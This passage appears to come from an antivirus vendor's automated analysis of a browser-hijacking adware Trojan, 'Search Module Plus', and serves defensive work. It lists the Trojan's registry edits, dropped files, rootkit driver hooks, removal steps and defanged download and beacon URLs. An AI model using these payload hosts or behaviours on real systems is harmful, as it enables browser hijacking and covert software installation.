[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]
"FaviconURLFallback" = "http://www-searching.com/favicon.ico"
"SuggestionsURL" = "http://api.searchpredict.com/api/?rqtype=ffplugin&siteID=8661&dbCode=1&command={searchTerms}"
"FaviconURL" = "http://www-searching.com/favicon.ico"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\ins_U501EXE_RASMANCS]
"ConsoleTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process tcpsvcs.exe:1504 makes changes in the system registry.


The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Version" = "2.3.12.1634"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Plus" = "1"
"(Default)" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"ExeLocation" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Search Module Plus]
"DisplayIcon" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"UninstallString" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus\smUninstall.exe"
"DisplayName" = "Search Module Plus"
"Publisher" = "Goobzo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\SearchModulePlus\Info]
"Aff" = "FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,"
"UserId" = "732923889-1296844034-1208581001"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\smu.exe]
"Install" = "%Program Files%\Common Files\Goobzo\GBUpdatePlus"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

Dropped PE files

MD5 File path
c5bf0ea484893a959b3ef0e7f041f379c:\Program Files\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll
29f111a07a51d38b8379171d3cf39ddbc:\Program Files\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe
2dd50829f5ce91e033636553405263cac:\Program Files\Common Files\Goobzo\GBUpdatePlus\Updater.exe
a879b0ae2ad98ac8e1c0f8912837eb2dc:\Program Files\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll
5931f1438015a3e263226d6ea4a8b182c:\Program Files\Common Files\Goobzo\GBUpdatePlus\sma.exe
675f7fdc1224c197df5e7eef84d1a8f9c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smci32.dll
10ba4048085923cf264eaeee708e98abc:\Program Files\Common Files\Goobzo\GBUpdatePlus\smi32.exe
4db4b7e64f2fb4e5394d085afb429280c:\Program Files\Common Files\Goobzo\GBUpdatePlus\smp.exe
556b1f1d6fd1f191c77b1167cd006abcc:\Program Files\Common Files\Goobzo\GBUpdatePlus\smu.exe
c9828a10a4b5644cf236b1cce749dddbc:\Program Files\Common Files\Goobzo\GBUpdatePlus\smw.sys
05c47da12b0009bd98653f51287f7768c:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls creation and closing of threads by installing the thread notifier.


Using the driver "\??\%Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys" the Trojan controls loading executable images into a memory by installing the Load image notifier.


Propagation

Removals

Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.

Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    smu.exe:2540
    smu.exe:3356
    sma.exe:308
    sma.exe:4008
    sma.exe:3164
    sma.exe:3192
    %original file name%.exe:3380
    %original file name%.exe:264
    smp.exe:3444
    smp.exe:2836
    tcpsvcs.exe:3488
    tcpsvcs.exe:1504

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\ProgramData\SearchModulePlus\smhe.js (407 bytes)
    C:\Windows\Temp\Pre83CF.tmp (601 bytes)
    C:\Windows\Temp\Pre93AB.tmp (601 bytes)
    C:\Windows\Temp\Web93AC.tmp (63 bytes)
    C:\Windows\Temp\Pre83E0.tmp (601 bytes)
    C:\Windows\Temp\Web83D0.tmp (63 bytes)
    C:\Windows\Temp\Web83E1.tmp (63 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_13704\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Installytd_6828\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Install_22888\bxsdk32.dll (1192 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Installer\Install_9822\%original file name%.exe (7433 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Search.lnk (2 bytes)
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Internet Explorer (No Add-ons).lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\Search.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\search-metadata.json (95 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Preferences (11028 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\searchplugins\smod.xml (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences (9416 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\5a2ce8gs.default\prefs.js (388 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SMUninstall.exe (10136 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\sma.exe (8560 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns715C.tmp (14 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\SBIEBrowserHelperObject.dll (3312 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns8C5D.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsExec.dll (14 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smci32.dll (45051 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\System.dll (23 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns85B7.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\AccD.dll (7392 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\Updater.exe (25776 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\ns96D9.tmp (14 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF9.tmp\nsProcess.dll (12 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\rlz_id.dll (3616 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smi32.exe (12088 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smu.exe (56684 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsr6EF8.tmp (245963 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smw.sys (784 bytes)
    %Program Files%\Common Files\Goobzo\GBUpdatePlus\smp.exe (6584 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version: 2.11.0.999
Legal Copyright: Copyright (C) 2014
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 2.11.0.999
File Description:
Comments:
Language: English (United States)

Company Name: Product Name: Product Version: 2.11.0.999 Legal Copyright: Copyright (C) 2014 Legal Trademarks: Original Filename: Internal Name: File Version: 2.11.0.999 File Description: Comments: Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40967607357608324.56168a9cacf15e913be2edf8056b7b3c7c54e
.rdata7659522347342350083.03602c4a59491089058aee935dcac3ad25217
.data10035202487292162.600934fa01dc463d1d2fe998b6fb156e49847
.rsrc103219230912312323.43692ffbcb515ad454512ea92926edc9d30de
.reloc106496048620486404.6178373b154c681e17bd08459beb64281acae

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://dyd9qf154h76q.cloudfront.net/bxsdk32.dll54.192.203.182
hxxp://d11sfnc01fj8ag.cloudfront.net/SetterExeV18.exe54.192.203.231
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=obiBp3WOda8YEV9pcuJwXtjCW9 eJMmAWub0ofDzkCEegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPkCN9h bV19VAhTD7v1xeC4pGvADS7bOhhWoLVpCM9iEhqt6HrlyoIuXkcHJamqYAkU5MDCXDxgXn558pQYeTa 1l 1OLNhgAaPzXL8pY6Nn8Drm/gTHnKRatpWcD7V21UixaxLjlbxVMF4Batz9n/4=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=aQQpsP6/AW3U0UsIWSR1jVRnyF84anr3YDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB49De26f9ELU77BAEjXP3GmOBvq/txek z3knywc6xSb54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTA30wp9ZePTAnJscN vLrCowpfd9Pvun2DZj3l0wecJba60LKguj6icg==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=QgW8pN5r26bof2QYjF1uPwq//z5qhHoX0EzYvxMWJRokIQgzNWOGCn 5ot6 EvdWkYIKgNqWBwS9Kbi6m4oCRvcc ZMAWsaKd CV/tiwlgli8v7N56mSgbKWjlfhE4uZvYsjUyDjDPpQHbPfmjbRP4kEtwV0krU/zEwKmF3LBrNhJ1C2zC9NPmVzJiGxHpFRq/ mwRQciAPvbT dq0IdZd990QLzNFTAqiKuwJ2QNWAL/XWHChDxEUKABP6K/iqqggPnHli0tZCBSCbmHG3q6QlEj4/HBfPTcUDrej7Uo8w=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRlFU7gimmHq/JscN vLrCo14/JpwhTbJacCuTErr5qdU=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRLWT0ooBBF1fVw12R6ofm/Y8iQvDAJnGKH8qnmCyK7v7JBTPp2F5gxC Mhrkq09y/amn0hKiMbceR3MOwIZ76JwmTqIjEwZJX8qZPamPhh78rf8SKYsXwuBxaqSxr2X7ENAlt3MuTiXc=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopR5YFWQUANi8 KgQWEQh9QronZvqoB 8mW4yIycFcn/ g=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRDvO0EiF3oHTyyO6Ebs4xmkKABP6K/iqqIBnlKRxyFokkn0XLiH0dH1LtCiNSAKYFf5JnRTepcv7VTVcd9MOBGUtwntjomLvg8OihZvFiIAIMn/yeJ21ljtcBdNV8N7h 54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=b1dRW7RxYKeNWlFVunW/r8YGSI1d A8Aymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk9UB7N1/dopRvcTB46xWnxTTJVfgp7thqbPiCC4paVhd54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM gO8fn3umFd V2PNcPuKknMw/KXmUS MBMPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrl JfVwpv1Wva0hvOLfOrKD/wvFkFqnHHo4G r 3F6T7MDuG8rKmKv5M2lG/K85LIzCdXy2lTPRW3vJOpxfY9B1A6K4wtfvcx1y2OGa7t1CL4lfxm/XoqxEdjLvQZAWuHXAH fOgpHnMH6wMvCefXXf GeemgIzPxkm30CyQo1Eg54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=xY8ohDYpM iNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquIApimWCrqakE8SFHLIEPsGc6 n uqijtZ6R90h7cidQhE1rXBz99ttxfA3C6KKE5uvEmaSYLmhGU1IGevJVygthPlRO7ICGTcD5MbnMHcJ64LtTjETGDUCjBYGPK7rWfXeCi/0KZZptbQRhqH8Cssw==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=XJYuqQQo69dBmScQe cMuF2PNcPuKknMCkdmPrP3LyEPOudYiEhu9PpaBjL6rcaUmQydu7v0XOmnNguChnjFYyy9pizPgo8YGz00ySamWlnMFAdL1xhsmXw8 OWurQVw3PC7x86FjYgov37HB1B/zlU5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mrp7TtIX8b4qVoW979 PTPR/sLIuaJBIVfI4G r 3F6T7f9F3I6C91SWT/e9lpr/riA==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmquvcTB46xWnxTle2fwOdHS0Y4G r 3F6T7bkBEy9Iv l4=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hbaBd5qR8ufkww3xXMGSlPc=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqu/rKHYTwtRGYUAvnawhe3hYcizBU3y3xpkudLwF4whtg=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqujsg/omkWbCTQlB3kfGAhd0M7 7p6G3XAOQeYuSCl878AKo0mRYbtZmTrdmoQBtHVvQShiKWZ9cFEj3apiqwElP87VSn8EQRfyltSMgrsTyl8aUSP2VoumlpLPC 4XcIm7cGFoGtp5ECS7IK1ett99MZ5kXJQtKy834mgW150Op0Y6r6EQu3En4ua1g4fVI4GJA9YFpnE8QO8567A9PF2tojJydmmwDtH8qBHSjX/hDYPr3Ugg3/8WtyvhlGeipNV537D3i/QmJNPHtdPmcrksKcwUL4uIo9bBcP67p/rswd0aUeoU PGdmwVVPh7TxXkBCDWG0W34WuMrG6DH6H0HA==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zWNWlFVunW/r0mQNIN2FjZnymls69hKl9tmuEHgxcoWKfKgR0o1/4Q2D691IIN//Frcr4ZRnoqTVed w94v0JiTTx7XT5nK5LCnMFC LiKPW3CdmCq5IQSELYVoKyjeTfp30iFVS yzj8CZ3PTQ1UlUpEhiK7 V9AecEbv57UoccxOeRFW191e4SaPEemp2rOI48VIs1kHEk3qnzi9PVmqubz0XqPn9zR0IiyFlsxNmPbPiCC4paVhdpvBRerX5l2CaTGmM9zHPWA==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsOQs n7i1BIkNjCW9 eJMmApZtSBouT4jcegceCn LKWZkWWo76FGxQr J80GV4qARlUrzhzYzRp9T0p0D2ZyJQsnGPPRmjDA5d2L30lHqijijq6TspxE6m6TnR9dT7ayjH2CJtGrtsnASlhOyjLJ/CbfW9VjeXxBEUN4frQ/ABXA9OLpJMWKahtbjfpf6GllFxBbrJqAIXPlLthe3E5HJFfRWApYRElbXqR4rzu9tChTEzQGoF c24CSOMVPCH eA=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pM6gKn8h0qT3aBcaoZob0e9Q==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hbDffmPgH7pMiQNTh4u5dqPxEMNdFi25Gw==54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=WL9usJOVMsPlWW0ay34fCUdUxmGl9EyeYDEAjQn1Lmtt1izXJZF/6oareh65cqCLl5HByWpqmAJFOTAwlw8YF5 efKUGHk2vtZftTizYYAGj81y/KWOjZzLYAxbXqOnWZKpgXCSq4SBoojstDGwv8wEB3BDXIoENw3BCY3BRdztfQ36gIM4S0WyMJQRmsW nYPPrzpUjRdY8g5 vR6QEB/nYE3DWujWaoU2sQ4uGCDUUAvnawhe3hYcizBU3y3xpkudLwF4whtg=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=043Mckb8Lnhw7iCtSAyu/ QhfXa/CCW5NPZS6pZIlAEr4Spdf2ZexL9An1YluClXsGG6qLQR8LceI9VTThLJ3UlF4mqrDXF/L3OhFAPbRTejORB6u31KNxKv6VolbFNDUxX212nyBDAafyyUl C9vORgvLZHT a72UC/bfWIAgSqinVSQQ1bE6yLXK7ul6nZPXUNd68JXUDrKwD6t b1ZfKiWnlKjT8nQI8HtM9wp5Tx0cXu7AB1uimF904v4t2DIApimWCrqakt3bH6c7GAHITnquSe8GwjLnPqEPf2/rl3s8pSKbhxWudjDabjiU15bfhBVTXmVIKy2EBoQQl304tsVuXqTBm48VmE3ZuCJs4y1aJnkp ScdBb0CbA7Wqcrbq8YHwKZS4RrSPwflTyFw==54.192.203.78
hxxp://d13s98z2lzti92.cloudfront.net/smw121634dp.exe54.192.203.172
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w=54.192.203.78
hxxp://d1y2jryd6u59ns.cloudfront.net/p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ==54.192.203.78
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A54.192.203.154
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8e5f14f8a0400cd752505753c0d3e3a5&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A54.192.203.154
hxxp://d23ocewf5ttxmu.cloudfront.net/br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=c4fa67064bd22dd0878e685855ab7e9a&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A54.192.203.154

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /bxsdk32.dll HTTP/1.1

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)

Host: dyd9qf154h76q.cloudfront.net

Connection: Keep-Alive

HTTP/1.1 200 OK

Content-Type: application/octet-stream

Content-Length: 942080

Connection: keep-alive

Date: Thu, 16 Mar 2017 13:47:42 GMT

